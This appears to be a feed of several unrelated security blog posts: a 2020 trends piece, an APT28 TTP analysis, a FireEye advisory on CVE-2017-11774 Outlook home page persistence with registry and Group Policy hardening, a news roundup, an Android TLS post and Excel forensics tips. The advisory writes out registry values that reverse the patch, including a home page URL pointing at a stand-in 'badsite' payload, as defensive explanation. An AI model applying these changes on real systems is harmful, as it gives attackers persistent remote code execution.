Hackers are already using AI to launch sophisticated attacks – for example AI algorithms can send ‘spear phishing’ tweets six times faster than a human and with twice the success. In 2020, by deploying intelligent, predictive systems, cyber analysts will be better positioned to anticipate the exponentially growing number of threats.

The Convergence of IT and OT
At the core of the Industry 4.0 trend is the convergence of operations technology (OT) and information technology (IT) networks, i.e. the convergence of industrial and traditional corporate IT systems. While this union of these formerly disparate networks certainly facilitates data exchange and enables organisations to improve business efficiency, it also comes with a host of new security concerns.

5G and IoT
While 5G promises faster speed and bandwidth for connections, it also comes with a new generation of security threats. 5G is expected to make more IoT services possible and the framework will no longer neatly fit into the traditional security models optimised for 4G. Security experts warn of threats related to the 5G-led IoT growth anticipated in 2020, such as a heightened risk of Distributed Denial-of-Service (DDoS) attacks.

Death of the Password
2020 could see organisations adopt new and sophisticated technologies to combat risks associated with weak passwords.

More Power to Data Protection Regulations
In 2020, regulations like GDPR, The California Consumer Privacy Act and PSD2 are expected to get harsher. We might also see announcements of codes of conduct specific to different business sectors like hospitality, aviation etc. All this will put pressure on businesses to make data security a top consideration at the board level.

APT28 Attacks Evolution

APT28 is a well-known Russian cyber espionage group attributed, with a medium level of confidence, to the Russian military intelligence agency GRU (by CrowdStrike). It is also known as Sofacy Group (by Kaspersky) or STRONTIUM (by Microsoft), and it is known to target aerospace, defence, government agencies, international organizations and media.

Today I’d like to share some personal notes after a few years of collecting evidence and reading on the topic.

Attack Timeline

The following timeline tracks APT28 back to 2008 and gives a quick view of how large and organized the threat group has become over the past decade.

APT28 Timeline

According to the many analyses by Unit42 (available HERE), FireEye (HERE, HERE) and TALOS (HERE, HERE), we can agree that APT28 was very active (or at least very frequently "spotted") between 2012 and 2019. However, most of the new attacks, qualitatively speaking, happened between 2018 and 2019. For that reason it is interesting to analyze how the group evolved over that time frame, in order to understand its changes and principal characteristics. From what I have tracked and read over the past few years, APT28 changed in many areas, but today I'd like to focus on three main ones: Weaponization, Delivery and Installation. Let's discuss each in turn.

Weaponization

Weaponization is a PRE-ATT&CK technique. It covers the operations needed to build and/or prepare a complex attack: the infrastructure, the samples, the command and controls, the domains and IPs, the certificates, the libraries and, generally speaking, everything that comes before the attack phase in terms of environment. Intelligence, HUMINT, information gathering, informal tests and so on are not included in Weaponization, since they fall directly into the ATT&CK framework.

Weaponization Timeline

Observing the weaponization timeline, three main blocks emerge, each with a few shared characteristics. From 2017 to early 2018, APT28 used techniques such as T1251, T1329, T1336 and T1319, which rely mainly on external, outsourced skill sets (except for T1319). Indeed, acquiring third-party infrastructure, installing and configuring hardware network systems, and using third-party obfuscation libraries would suggest either a shortage of human resources or a deliberate false-flag intent. From early 2018 to mid-2018 the weaponization chain changed considerably, moving to T1314, T1322 and T1328. These techniques reinforce the idea that the group moved away from external professional resources and hardware-localized techniques toward internal professional resources (indeed, they started buying their own domains for propagation and C2). Finally, from October 2018 to late March 2019, APT28 introduced a totally different weaponization technique: T1345. It is not a direct consequence of the previously observed techniques; we might instead think they improved, or forked, an internal dev team. These self-development capabilities (implemented via T1345) were not observed in past years and mark a significant change: the group may have enrolled a dedicated dev team, or split the existing one across two different paths.

Delivery

Delivery is the way attackers get the initial content to the victim; in other words, how the adversary reaches the victim and starts the infection chain. The delivery vector is often the only (or the first) artifact (such as a malware sample, a link, or exploit-kit usage) that a cybersecurity analyst can observe. Analysts rarely have the chance to track every attack phase; they usually see only a small portion of it, and very often that portion is the delivered artifact. Tracking changes in delivery helps analysts build a picture of threat actors by comparing similarities and differences in coding, style and techniques. Indeed, the delivery phase is a key point for distinguishing threat actors, which tend to specialize their crafting capabilities over time rather than pivot to new delivery vectors. The following timeline shows how delivery changed over the analyzed time frames.

Delivery Timeline

While the weaponization section showed three main macro blocks, the delivery section looks uniform and quite flat, based on technique T1193: spearphishing with a malicious attachment. But if we focus on the beginning of 2018, APT28 appears to have used a more consolidated intelligence technique (T1376), relying on human intelligence to gather the information needed to deliver a well-crafted email campaign (against government institutions related to foreign affairs). The delivery phase at that time implemented a quite sophisticated dropper, exploiting vulnerabilities to "save and run" the payload in the desired place. The vulnerabilities most exploited by APT28 have been tracked as follows:

CVE-2017-0144 , CVE-2013-3897, CVE-2014-1776, CVE-2012-0158, CVE-2015-5119, CVE-2013-3906, CVE-2015-7645, CVE-2015-2387, CVE-2010-3333, CVE-2015-1641, CVE-2013-1347, CVE-2015-3043, CVE-2015-1642, CVE-2015-2590, CVE-2015-1701, CVE-2015-4902, CVE-2017-0262, CVE-2017-0263
CVE-2014-4076, CVE-2014-0515

The most exploited tracked vulnerabilities mainly target Windows, Adobe Flash and Oracle technologies. Over the past few months (almost a year at the time of writing), there has been a rapid increase in the use of Microsoft Office vulnerabilities to drop second-stage payloads. This fits the current trend and the observed infection chains.

Installation

While system persistence can be achieved in many different ways, for example by periodically exploiting an RCE vulnerability, persistence in malware attacks is typically called "Installation". Since the findings analyzed for this post are malware based, it makes sense to talk about installation rather than persistence in general. Moreover, the installation procedure plays a key role in the infection chain. Observing installation techniques is a meaningful way to understand the development team behind the software: developers tend not to change installation procedures over time, preferring to focus on new features and improvements to existing modules rather than reworking installation frameworks. The following timeline shows how APT28's installation procedures changed over time.

Installation Timeline

The observed time frame focuses on the past year, where the most interesting changes happened, at least in my personal opinion. In early 2018 the most used techniques were T1055, T1045, T1064, T1158 and T1037. Most of these belong to the scripting world: the most influential capabilities were based on logon scripts and JS/VB scripting. From roughly mid-2018 the group moved mostly to the PowerShell scripting language (T1086 and T1140), widely used over the past two years, ending up in early 2019 with more advanced development techniques such as T1221, T1204, T1045, T1047 and T1112, which point to an interesting new development skill set.

Conclusions

Like many groups, APT28 evolves over time. This evolution touches many TTPs (Tactics, Techniques and Procedures), but this time I decided to focus on installation, delivery and weaponization. Most of the tracked changes happened during the last one to two years, showing a rapid enhancement of the group's development, obfuscation and evasion skill sets.

Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774)

Attackers have a dirty little secret that is being used to conduct big intrusions. We'll explain how they're "unpatching" an exploit, and then provide new Outlook hardening guidance that is not available elsewhere. Specifically, this blog post covers field-tested, automated enforcement of the registry keys that protect against attacker attempts to reverse Microsoft's CVE-2017-11774 patch functionality.

Despite multiple warnings from FireEye and U.S. Cyber Command, we have continued to observe an uptick in successful exploitation of CVE-2017-11774, a client-side Outlook attack that involves modifying victims’ Outlook client homepages for code execution and persistence. The Outlook Home Page feature allows for customization of the default view for any folder in Outlook. This configuration can allow for a specific URL to be loaded and displayed whenever a folder is opened. This URL is retrieved either via HTTP or HTTPS - and can reference either an internal or external network location. When Outlook loads the remote URL, it will render the contents using the Windows DLL ieframe.dll, which can allow an attacker to achieve remote code execution that persists through system restarts.

We have observed multiple threat actors adopting the technique, which eventually became a favorite of Iranian groups in support of both espionage and reportedly destructive attacks. FireEye first observed APT34 use CVE-2017-11774 in June 2018, followed by adoption by APT33 for a significantly broader campaign beginning in July 2018 and continuing for at least a year. To further increase awareness of this intrusion vector, our Advanced Practices team worked with MITRE to update the ATT&CK framework to include CVE-2017-11774 home page persistence within technique T1137 – “Office Application Startup”.

For more information on how CVE-2017-11774 exploitation works, how APT33 implemented it alongside password spraying, and some common pitfalls for incident responders analyzing this home page technique, see the “RULER In-The-Wild” section of our December 2018 OVERRULED blog post.

Going Through a Rough Patch

On October 10, 2017, Microsoft released patches for Microsoft Outlook to protect against this technique.

  • KB4011196 (Outlook 2010)
  • KB4011178 (Outlook 2013)
  • KB4011162 (Outlook 2016)

Following the mid-2018 abuse by Iranian threat actors first detailed in our OVERRULED blog post, the FireEye Mandiant team began to raise awareness of how the patch could be subverted. Doug Bienstock discussed in December 2018 the simple rollback of the patch as part of Mandiant's Red Team operations – and alluded to observing authorized software that also automatically removes the patch functionality. In response to U.S. Cyber Command's mid-2019 warning about APT33's use of the exploit, we raised concerns with DarkReading about the ability to override the CVE-2017-11774 patch without escalated privileges.

Without continuous reinforcement of the recommended registry settings for CVE-2017-11774 hardening detailed within this blog post, an attacker can add or revert registry keys for settings that essentially disable the protections provided by the patches.

An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys. The “URL” subkey will enable and set a home page for the specified mail folder within the default mailbox. Setting this registry key to a valid URL enables the home page regardless of the patch being applied or not. Although the option will not be accessible from the Outlook user interface (UI), it will still be set and render. Importantly, these keys are set within the logged-on user’s Registry hive. This means that no special privileges are required to edit the Registry and roll back the patch. The FireEye Red Team found that no other registry modifications were required to set a malicious Outlook homepage.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\WebView\Inbox
"URL"="http://badsite/homepage-persist.html"

There are additional keys within the Registry that can be modified to further roll back the patch and expose unsafe options in Outlook. The following setting can be used to re-enable the original home page tab and roaming home page behavior in the Outlook UI.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
"EnableRoamingFolderHomepages"= dword:00000001

The following setting will allow for folders within secondary (non-default) mailboxes to leverage a custom home page.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
"NonDefaultStoreScript"= dword:00000001

The following setting will allow for “Run as a Script” and “Start Application” rules to be re-enabled.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
"EnableUnsafeClientMailRules"= dword:00000001
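These checks lend themselves to automation. The sketch below is a minimal, hypothetical audit helper (not a FireEye tool) that compares observed Outlook `Security` registry values against the hardened baseline recommended in this post; on a live Windows host the `observed` dictionary would be populated via `winreg`, which is omitted here to keep the sketch platform-neutral.

```python
# Hypothetical audit sketch: the baseline below reflects the hardened
# values recommended in this post; the function flags any value an
# attacker has flipped away from the safe setting.
HARDENED_BASELINE = {
    "EnableRoamingFolderHomepages": 0,
    "NonDefaultStoreScript": 0,
    "EnableUnsafeClientMailRules": 0,
}

def find_reversed_settings(observed: dict) -> list:
    """Return names of settings that differ from the hardened baseline.

    A missing value is treated as compliant here, since the patch
    defaults are safe; only an explicitly unsafe value is flagged.
    """
    reversed_keys = []
    for name, safe_value in HARDENED_BASELINE.items():
        if name in observed and observed[name] != safe_value:
            reversed_keys.append(name)
    return reversed_keys

# Example: an attacker re-enabled roaming folder home pages.
print(find_reversed_settings({"EnableRoamingFolderHomepages": 1}))
# → ['EnableRoamingFolderHomepages']
```

On Windows the same comparison would be driven by values read from `HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security`.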

Etienne Stalmans, a developer of SensePost's RULER and the credited responsible discloser of CVE-2017-11774, raised similar concerns about the patch after a September 2018 blog post showed the same technique applied to Outlook Today's home page, which is stored at HKCU\Software\Microsoft\Office\<Outlook Version>\Outlook\Today\UserDefinedUrl. Both Etienne and the September 2018 blog post's author describe what Microsoft has suggested as a key mitigating factor: the exploit, and rolling back the patch, require some form of initial access. This is consistent with Microsoft's position and their 2007 "immutable laws of security" blog, which were reiterated when we contacted MSRC prior to publishing this blog post.

We agree that for the CVE-2017-11774 patch override vector to be successful, a bad guy has to persuade you to run his program (law #1) and alter your operating system (law #2). However, the technique is under-reported, no public mitigation guidance is available, and – as a fresh in-the-wild example in this post demonstrates – both initial access and patch overriding can be completely automated.

A Cavalier Handling of CVE-2017-11774

The Advanced Practices team monitors for novel implementations of attacker techniques including this patch override, and on November 23, 2019 a uniquely automated phishing document was uploaded to VirusTotal. The sample, “TARA Pipeline.xlsm” (MD5: ddbc153e4e63f7b8b6f7aa10a8fad514), launches malicious Excel macros combining several techniques, including:

  • execution guardrails to only launch on the victim domain (client redacted in screenshot)
  • custom pipe-delimited character substitution obfuscation
  • a creative implementation of CVE-2017-11774 using the lesser-known HKCU\Software\Microsoft\Office\<Outlook Version>\Outlook\WebView\Calendar\URL registry key
  • a URL pointing to the payload hosted in Azure storage blobs (*.web.core.windows.net) – a creative technique that allows an attacker-controlled, swappable payload to be hosted in a legitimate service
  • and most importantly for this blog post – a function to walk through the registry and reverse the CVE-2017-11774 patch functionality for any version of Microsoft Outlook

These features of the malicious spear phishing Excel macro can be seen in Figure 1.


Figure 1: Malicious macros automatically reverting the CVE-2017-11774 patch

Pay special attention to the forced setting of EnableRoamingFolderHomepages to "1" and the configuration of the "Calendar\URL" key to point to an attacker-controlled payload, effectively disabling the CVE-2017-11774 patch on initial infection.

In support of Managed Defense, our Advanced Practices team clusters and tactically attributes targeted threat activity – whether the intrusion operators turn out to be authorized or unauthorized – in order to prioritize and deconflict intrusions. In this case, Nick Carr attributed this sample to an uncategorized cluster of activity associated with authorized red teaming, UNC1194, but you might know them better as the TrustedSec red team, whose founder, Dave Kennedy, appeared on a previous episode of State of the Hack. This malicious Excel file appears to be a weaponized version of a legitimate victim-created document that we also obtained – reflecting a technique becoming more common with both authorized and unauthorized intrusion operators. For further analysis and screenshots of UNC1194's next stage CVE-2017-11774 payload for initial reconnaissance, target logging visibility checks, and domain-fronted Azure command and control – see here. Readers should take note that the automated patch removal and home page exploitation establishes attacker-controlled remote code execution and allowed these [thankfully authorized] attackers to conduct a full intrusion by swapping out their payload remotely for all follow-on activity.

Locking Down the Registry Keys Using Group Policy Object (GPO) Enforcement

As established, the patches for CVE-2017-11774 can be effectively “disabled” by modifying registry keys on an endpoint with no special privileges. The following registry keys and values should be configured via Group Policy to reinforce the recommended configurations in the event that an attacker attempts to reverse the intended security configuration on an endpoint to allow for Outlook home page persistence for malicious purposes.

To protect against an attacker using Outlook’s WebView functionality to configure home page persistence, the following registry key configuration should be enforced.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\WebView
"Disable"= dword:00000001

Note: Prior to enforcing this hardening method for all endpoints, the previous setting should be tested on a sampling of endpoints to ensure compatibility with third-party applications that may leverage webviews.

To enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.

  • User Configuration > Preferences > Windows Settings > Registry
    • New > Registry Item
      • Action: Update
      • Hive: HKEY_CURRENT_USER
      • Key Path: Software\Microsoft\Office\<Outlook Version>\Outlook\Webview
        • Value Name: Disable
      • Value Type: REG_DWORD
      • Value Data: 00000001


Figure 2: Disabling WebView registry setting

Included within the Microsoft Office Administrative Templates, a GPO setting is available which can be configured to disable a home page URL from being set in folder properties for all default folders, or for each folder individually.  If set to “Enabled”, the following GPO setting essentially enforces the same registry configuration (disabling WebView) as previously noted.

User Configuration > Policies > Administrative Templates > Microsoft Outlook <version> > Folder Home Pages for Outlook Special Folders > Do not allow Home Page URL to be set in folder Properties

The registry key configuration to disable setting an Outlook home page via the Outlook UI is as follows.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
"EnableRoamingFolderHomepages"= dword:00000000

To enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.

  • User Configuration > Preferences > Windows Settings > Registry
    • New > Registry Item
      • Action: Update
      • Hive: HKEY_CURRENT_USER
      • Key Path: Software\Microsoft\Office\<Outlook Version>\Outlook\Security
        • Value Name: EnableRoamingFolderHomepages
      • Value Type: REG_DWORD
      • Value Data: 00000000


Figure 3: EnableRoamingFolderHomepages registry setting

Additionally, a home page in Outlook can be configured for folders in a non-default datastore. This functionality is disabled once the patch has been installed, but it can be re-enabled by an attacker. Just like this blog post’s illustration of several different home page URL registry keys abused in-the-wild – including the Outlook Today setting from September 2018 and the Calendar URL setting from UNC1194’s November 2019 malicious macros – these non-default mailstores provide additional CVE-2017-11774 attack surface.

The registry key configuration to enforce the recommended registry configuration is as follows.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
"NonDefaultStoreScript"= dword:00000000

To enforce the expected hardened configuration of the registry key for non-default mailstores using a GPO, the following setting can be configured.

  • User Configuration > Preferences > Windows Settings > Registry
    • New > Registry Item
      • Action: Update
      • Hive: HKEY_CURRENT_USER
      • Key Path: Software\Microsoft\Office\<Outlook Version>\Outlook\Security
        • Value Name: NonDefaultStoreScript
      • Value Type: REG_DWORD
      • Value Data: 00000000


Figure 4: NonDefaultStoreScript registry setting

Included within the previously referenced Microsoft Office Administrative Templates, a GPO setting is available which can be configured to not allow folders in non-default stores to be set as folder home pages.

User Configuration > Policies > Administrative Templates > Microsoft Outlook <version> > Outlook Options > Other > Advanced > Do not allow folders in non-default stores to be set as folder home pages

While you're locking things down, readers will also want to ensure they are protected against RULER's other modules for rules-based persistence and forms-based persistence. This last recommendation ensures that the rule types required by the other RULER modules are no longer permissible on an endpoint. While not CVE-2017-11774, this is closely related, and this last setting is consistent with Microsoft's prior guidance on rules and forms persistence.

The registry key configuration to protect against an attacker re-enabling “Run as a Script” and “Start Application” rules is as follows.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security\
"EnableUnsafeClientMailRules"= dword:00000000

To enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.

  • User Configuration > Preferences > Windows Settings > Registry
    • New > Registry Item
      • Action: Update
      • Hive: HKEY_CURRENT_USER
      • Key Path: Software\Microsoft\Office\<Outlook Version>\Outlook\Security
        • Value Name: EnableUnsafeClientMailRules
      • Value Type: REG_DWORD
      • Value Data: 00000000


Figure 5: EnableUnsafeClientMailRules registry setting

Once all of the aforementioned endpoint policies are configured, we recommend a final step to protect these settings from unauthorized tampering. To ensure that the registry settings (configured via GPO) are continuously assessed and applied to an endpoint – even if the registry value was intentionally reversed by an attacker – the following GPO settings should also be configured and enforced:

  • Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure security policy processing
    • Enabled - Process even if the Group Policy objects have not changed
  • Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure registry policy processing
    • Enabled - Process even if the Group Policy objects have not changed


Figure 6: Group Policy processing settings

For more environment hardening advice informed by front-line incident response, reach out to our Mandiant Security Transformation Services consulting team.

Let’s Go Hunt (doo doo doo)

With this blog post, we’re providing an IOC for monitoring CVE-2017-11774 registry tampering – while written for FireEye Endpoint Security (HX) in the OpenIOC 1.1 schema, this is a flexible behavioral detection standard that supports real-time and historical events and the logic can be repurposed for other endpoint products.
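As an illustration of the kind of logic such an IOC encodes (the actual OpenIOC is distributed separately and is not reproduced here), a rough Python sketch might flag registry writes that touch the home page URL keys or the hardening values discussed above. The regex and function names below are our own illustrative assumptions, not part of any FireEye product.

```python
import re

# Illustrative only: NOT the published OpenIOC, just a sketch of the
# behavior it targets. Flag registry-write events whose path matches an
# Outlook home page URL key or a CVE-2017-11774 hardening value an
# attacker would flip.
SUSPICIOUS_KEY = re.compile(
    r"\\Software\\Microsoft\\Office\\[^\\]+\\Outlook\\"
    r"(?:WebView\\.+\\URL"
    r"|Today\\UserDefinedUrl"
    r"|Security\\EnableRoamingFolderHomepages"
    r"|Security\\NonDefaultStoreScript"
    r"|Security\\EnableUnsafeClientMailRules)$",
    re.IGNORECASE,
)

def is_suspicious_registry_write(key_path: str) -> bool:
    """Return True if a registry path looks like home page tampering."""
    return SUSPICIOUS_KEY.search(key_path) is not None

print(is_suspicious_registry_write(
    r"HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook"
    r"\WebView\Calendar\URL"))  # → True
```

Logic like this could be run over endpoint registry-event telemetry, both in real time and against historical events, mirroring the behavioral IOC described above.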

The Yara hunting rule provided by Nick Carr at the end of the OVERRULED blog post still captures payloads using CVE-2017-11774, including all of those used in intrusions referenced in this post, and can also be used to proactively identify home page exploits staged on adversary infrastructure. Further FireEye product detection against CVE-2017-11774 is also covered in the OVERRULED blog post.

If you’ve read the OVERRULED post (or are tired of hearing about it) but want some additional information, we recommend:

Interesting MITRE ATT&CK techniques explicitly referenced in this blog post:

ID | Technique | Context
T1137 | Office Application Startup | Nick Carr contributed CVE-2017-11774 on behalf of FireEye for expansion of this technique
T1480 | Execution Guardrails | Nick Carr contributed this new technique to MITRE ATT&CK and it is used within the UNC1194 red team sample in this blog post

Acknowledgements

The authors would like to acknowledge all of those at FireEye and the rest of the security industry who have combatted targeted attackers leveraging creative techniques like home page persistence, but especially the analysts in Managed Defense SOC working around the clock to secure our customers and have disrupted this specific attack chain several times. We want to thank the SensePost team – for their continued creativity, responsible disclosure of CVE-2017-11774, and their defensive-minded release of NotRuler – as well as the TrustedSec crew for showing us some innovative implementations of these techniques and being great to coordinate with on this blog post. Lastly, thanks to Aristotle who has already offered what can only be interpreted as seasoned incident response and hardening advice for those who have seen RULER’s home page persistence in-the-wild: “He who is to be a good ruler must have first been ruled.”

Cyber Security Roundup for November 2019

In recent years, politically motivated cyber attacks during elections have become the expected norm, so it was no real surprise when the Labour Party reported it was hit with two DDoS cyber attacks in the run-up to the UK general election, which was well publicised by the media. However, what wasn't well publicised was that both the Conservative Party and the Liberal Democrats were also hit with cyber attacks. These weren't nation-state orchestrated attacks either: black hat hacking group Lizard Squad, well known for their high-profile DDoS attacks, are believed to be the culprits.

The launch of Disney Plus didn't go exactly to plan: within hours of the streaming service going live, compromised Disney Plus account credentials were being sold on the black market for as little as £2.30 a pop. Disney suggested hackers had obtained customer credentials from previous leaks of identical credentials, reused by customers on other compromised or insecure websites, and from keylogging malware. It's worth noting Disney Plus doesn't use multi-factor authentication (MFA); in my view, implementing MFA to protect customer accounts would have prevented the vast majority of these account compromises.

Trend Micro reported that an insider stole around 100,000 customer account records, with the data then used by cyber con artists to make convincing scam phone calls impersonating the company to a number of its customers. In a statement, Trend Micro said it determined the attack was an inside job: an employee used fraudulent methods to access its customer support databases, retrieved the data and then sold it on. “Our open investigation has confirmed that this was not an external hack, but rather the work of a malicious internal source that engaged in a premeditated infiltration scheme to bypass our sophisticated controls,” the company said. The employee behind it was identified and fired, and Trend Micro said it is working with law enforcement in an ongoing investigation.

Security researchers found 4 billion records on 1.2 billion people on an unsecured Elasticsearch server. The personal information includes names, home and mobile phone numbers, and email addresses, as well as what may be information scraped from LinkedIn, Facebook and other social media sources.

T-Mobile reported a data breach affecting some of their prepaid account customers. A T-Mobile spokesman said “Our cybersecurity team discovered and shut down malicious, unauthorized access to some information related to your T-Mobile prepaid wireless account. We promptly reported this to authorities”.

A French hospital was hit hard by a ransomware attack which caused "very long delays in care". According to a spokesman, medical staff at Rouen University Hospital Centre (CHU) abandoned PCs as ransomware had made them unusable; instead, staff returned to the "old-fashioned method of paper and pencil". No details about the strain of the ransomware have been released.

Microsoft released patches for 74 vulnerabilities in November, including 13 rated as critical. One of these was an Internet Explorer vulnerability (CVE-2019-1429), an ActiveX flaw known to be actively exploited via malicious websites.

It was a busy month for blog articles and threat intelligence news, all are linked below.

BLOG
NEWS
VULNERABILITIES AND SECURITY UPDATES
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
HUAWEI NEWS AND THREAT INTELLIGENCE

An Update on Android TLS Adoption

Posted by Bram Bonné, Senior Software Engineer, Android Platform Security & Chad Brubaker, Staff Software Engineer, Android Platform Security


Android is committed to keeping users, their devices, and their data safe. One of the ways that we keep data safe is by protecting network traffic that enters or leaves an Android device with Transport Layer Security (TLS).

Android 7 (API level 24) introduced the Network Security Configuration in 2016, allowing app developers to configure the network security policy for their app through a declarative configuration file. To ensure apps are safe, apps targeting Android 9 (API level 28) or higher automatically have a policy set by default that prevents unencrypted traffic for every domain.

Today, we’re happy to announce that 80% of Android apps are encrypting traffic by default. The percentage is even greater for apps targeting Android 9 and higher, with 90% of them encrypting traffic by default.

Percentage of apps that block cleartext by default.


Since November 1, 2019, all app updates, as well as all new apps on Google Play, must target at least Android 9. As a result, we expect these numbers to continue improving. Network traffic from these apps is secure by default, and any use of unencrypted connections is the result of an explicit choice by the developer.

The latest releases of Android Studio and Google Play’s pre-launch report warn developers when their app includes a potentially insecure Network Security Configuration (for example, when they allow unencrypted traffic for all domains or when they accept user provided certificates outside of debug mode). This encourages the adoption of HTTPS across the Android ecosystem and ensures that developers are aware of their security configuration.

Example of a warning shown to developers in Android Studio.


Example of a warning shown to developers as part of the pre-launch report.


What can I do to secure my app?

For apps targeting Android 9 and higher, the out-of-the-box default is to encrypt all network traffic in transit and trust only certificates issued by an authority in the standard Android CA set without requiring any extra configuration. Apps can provide an exception to this only by including a separate Network Security Config file with carefully selected exceptions.

If your app needs to allow traffic to certain domains, it can do so by including a Network Security Config file that only includes these exceptions to the default secure policy. Keep in mind that you should be cautious about the data received over insecure connections as it could have been tampered with in transit.

<network-security-config>
<base-config cleartextTrafficPermitted="false" />
<domain-config cleartextTrafficPermitted="true">
<domain includeSubdomains="true">insecure.example.com</domain>
<domain includeSubdomains="true">insecure.cdn.example.com</domain>
</domain-config>
</network-security-config>

If your app needs to accept user-specified certificates for testing purposes (for example, connecting to a local server during testing), make sure to wrap your trust-anchors element inside a debug-overrides element, as shown below. This ensures the connections in the production version of your app are secure.

<network-security-config>
<debug-overrides>
<trust-anchors>
<certificates src="user"/>
</trust-anchors>
</debug-overrides>
</network-security-config>

What can I do to secure my library?

If your library directly creates secure/insecure connections, make sure that it honors the app's cleartext settings by checking isCleartextTrafficPermitted before opening any cleartext connection.

Android’s built-in networking libraries and other popular HTTP libraries such as OkHttp or Volley have built-in Network Security Config support.

Giles Hogben, Nwokedi Idika, Android Platform Security, Android Studio and Pre-Launch Report teams

NICE Webinar: How You Can Influence an Update to the NICE Framework

The PowerPoint slides used during this webinar can be downloaded here. Speakers:
  • Bill Newhouse, Deputy Director, National Initiative for Cybersecurity Education (NICE), National Institute of Standards and Technology (NIST)
  • Senior Human Capital Strategist, Booz Allen Hamilton, on behalf of the Department of Defense, Office of the Chief Information Officer
  • Benjamin Scribner, Section Chief, Stakeholder Engagement Division, Cybersecurity and Infrastructure Security Agency (CISA)
  • Pamela Frugoli, Senior Workforce Analyst, Employment and Training Administration (ETA), US Department of Labor
  • Danielle

Excelerating Analysis – Tips and Tricks to Analyze Data with Microsoft Excel

Incident response investigations don’t always involve standard host-based artifacts with fully developed parsing and analysis tools. At FireEye Mandiant, we frequently encounter incidents that involve a number of systems and solutions that utilize custom logging or artifact data. Determining what happened in an incident involves taking a dive into whatever type of data we are presented with, learning about it, and developing an efficient way to analyze the important evidence.

One of the most effective tools to perform this type of analysis is one that is in almost everyone’s toolkit: Microsoft Excel. In this article we will detail some tips and tricks with Excel to perform analysis when presented with any type of data.

Summarizing Verbose Artifacts

Tools such as FireEye Redline include handy timeline features to combine multiple artifact types into one concise timeline. When we use individual parsers or custom artifact formats, it may be tricky to view multiple types of data in the same view. Normalizing artifact data with Excel to a specific set of easy-to-use columns makes for a smooth combination of different artifact types.

Consider trying to review parsed file system, event log, and Registry data in the same view using the following data.

File system record:

  $SI Created:     2019-10-14 23:13:04
  $SI Modified:    2019-10-14 23:33:45
  File Name:       Default.rdp
  File Path:       C:\Users\attacker\Documents\
  File Size:       485
  File MD5:        c482e563df19a401941c99888ac2f525
  File Attributes: Archive
  File Deleted:    FALSE

Event log record:

  Event Gen Time: 2019-10-14 23:13:06
  Event ID:       4648
  Event Message:  A logon was attempted using explicit credentials.

    Subject:
       Security ID:  DomainCorp\Administrator
       Account Name:  Administrator
       Account Domain:  DomainCorp
       Logon ID:  0x1b38fe
       Logon GUID:  {00000000-0000-0000-0000-000000000000}
    Account Whose Credentials Were Used:
       Account Name:  VictimUser
       Account Domain:  DomainCorp
       Logon GUID:  {00000000-0000-0000-0000-000000000000}
    Target Server:
       Target Server Name: DestinationServer
       Additional Information:
    Process Information:
       Process ID:  0x5ac
       Process Name:  C:\Program Files\Internet Explorer\iexplore.exe
    Network Information:
       Network Address: -
       Port:   -

  Event Category: Logon
  Event User:     Administrator
  Event System:   SourceSystem

Registry record:

  KeyModified: 2019-10-14 23:33:46
  Key Path:    HKEY_USER\Software\Microsoft\Terminal Server Client\Servers\
  KeyName:     DestinationServer
  ValueName:   UsernameHInt
  ValueText:   VictimUser
  Type:        REG_SZ

Since these raw artifact data sets have different column headings and data types, they would be difficult to review in one timeline. If we format the data using Excel string concatenation, we can make it easy to combine into a single timeline view. To format the data, we can use the "&" operator to join the information we need into a "Summary" field.

An example formula to join the relevant file system data, delimited by pipes, could be =D2 & " | " & C2 & " | " & E2 & " | " & F2 & " | " & G2 & " | " & H2. Combining this formula with a "Timestamp" and "Timestamp Type" column gives us everything we need for streamlined analysis.

Timestamp: 2019-10-14 23:13:04
Timestamp Type: $SI Created
Event: C:\Users\attacker\Documents\ | Default.rdp | 485 | c482e563df19a401941c99888ac2f525 | Archive | FALSE

Timestamp: 2019-10-14 23:13:06
Timestamp Type: Event Gen Time
Event: 4648 | A logon was attempted using explicit credentials.

Subject:
   Security ID:  DomainCorp\Administrator
   Account Name:  Administrator
   Account Domain:  DomainCorp
   Logon ID:  0x1b38fe
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
   Account Name:  VictimUser
   Account Domain:  DomainCorp
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Target Server:
   Target Server Name: DestinationServer
   Additional Information:
Process Information:
   Process ID:  0x5ac
   Process Name:  C:\Program Files\Internet Explorer\iexplore.exe
Network Information:
   Network Address: -
   Port:   - | Logon | Administrator | SourceSystem

Timestamp: 2019-10-14 23:33:45
Timestamp Type: $SI Modified
Event: C:\Users\attacker\Documents\ | Default.rdp | 485 | c482e563df19a401941c99888ac2f525 | Archive | FALSE

Timestamp: 2019-10-14 23:33:46
Timestamp Type: KeyModified
Event: HKEY_USER\Software\Microsoft\Terminal Server Client\Servers\ | DestinationServer | UsernameHint | VictimUser

After sorting by timestamp, we can see evidence of the “DomainCorp\Administrator” account connecting from “SourceSystem” to “DestinationServer” with the “DomainCorp\VictimUser” account via RDP across three artifact types.

Time Zone Conversions

One of the most critical elements of incident response and forensic analysis is timelining. Temporal analysis will often turn up new evidence by identifying events that precede or follow an event of interest. Equally critical is producing an accurate timeline for reporting. Timestamps and time zones can be frustrating, and things can get confusing when the systems being analyzed span various time zones. Mandiant tracks all timestamps in Coordinated Universal Time (UTC) in its investigations to eliminate confusion from both time zone differences and seasonal adjustments such as daylight saving time.

